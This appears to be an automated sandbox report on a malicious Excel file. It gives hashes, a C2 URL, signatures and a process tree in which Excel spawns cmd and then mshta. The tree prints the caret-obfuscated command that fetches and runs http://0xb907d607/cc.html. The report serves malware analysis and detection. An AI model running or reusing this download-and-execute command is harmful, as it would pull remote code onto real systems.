Analysis
-
max time kernel
139s -
max time network
144s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
18-01-2022 13:12
Behavioral task
behavioral1
Sample
e5f7c1f04f9057742b40ff1383040d2326c9cb981cdeb9ccebec4c9467fdece2.xls
Resource
win10-en-20211208
General
-
Target
e5f7c1f04f9057742b40ff1383040d2326c9cb981cdeb9ccebec4c9467fdece2.xls
-
Size
128KB
-
MD5
28bf917143932c4f39e2580eac6741d6
-
SHA1
0c45b4386b3203b1003e70ce82feb3a182da3483
-
SHA256
e5f7c1f04f9057742b40ff1383040d2326c9cb981cdeb9ccebec4c9467fdece2
-
SHA512
0b6aea9905cdbd8bedda7118f47b14b79517fe1da2e9bcc5319253ca154f47a0286af9ace721780ca42f3c427461e52d1f797cfd724b2553e9c45e664e6a02c0
Malware Config
Extracted
http://0xb907d607/cc.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1944 3760 cmd.exe 67 -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid Process 39 1988 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 3760 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid Process 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid Process procid_target PID 3760 wrote to memory of 1944 3760 EXCEL.EXE 69 PID 3760 wrote to memory of 1944 3760 EXCEL.EXE 69 PID 1944 wrote to memory of 1988 1944 cmd.exe 71 PID 1944 wrote to memory of 1988 1944 cmd.exe 71
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\e5f7c1f04f9057742b40ff1383040d2326c9cb981cdeb9ccebec4c9467fdece2.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/c^c.h^tm^l2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/cc.html3⤵
- Blocklisted process makes network request
PID:1988
-
-